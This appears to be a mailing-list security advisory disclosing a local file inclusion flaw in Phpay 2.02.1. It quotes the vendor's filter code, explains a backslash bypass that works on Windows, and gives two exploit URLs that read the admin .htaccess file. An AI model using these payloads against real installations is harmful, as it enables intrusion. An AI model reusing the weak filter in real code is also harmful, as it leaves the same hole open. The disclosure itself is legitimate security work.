<<< Date Index >>>     <<< Thread Index >>>

Phpay - Local File Inclusion



By Michael Brooks

Vulnerability Type:Local File Inclusion

Software: Phpay

Homepage:http://sourceforge.net/projects/phpay/

Version Affected:2.02.1



Phpay has been affected by multiple local file include flaws, as a result this 
patch was written:

$config = ereg_replace(":","", $config);

$config = trim(ereg_replace("../","", $config));

$config = trim(ereg_replace("/","", $config));

if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; 
echo "<!--$config-->\n";}

if (!file_exists("$config")) { echo "panic: $config doesn't exist!! Did you 
backup it after installation? ..."; exit;}

require("./$config");



To bypass this patch backslashes can be used instead of forward slashes on 
windows systems.  

Also .inc.php must exists *somewhere* in the string.

Local File Include for windows only:

http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess

or if magic_quotes_gpc is turned on:

http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess



Remote code execution is accessible in the ./admin/ folder. 

The admin folder *should* be protected by a .htaccess file similar to 
osCommerce2. 



Vulnerable configuration:

A there is a call to extract($_GET) so the exploit will work regardless of 
register_globals.  Using Linux is a very good fix for this issue. 





Merry Christmas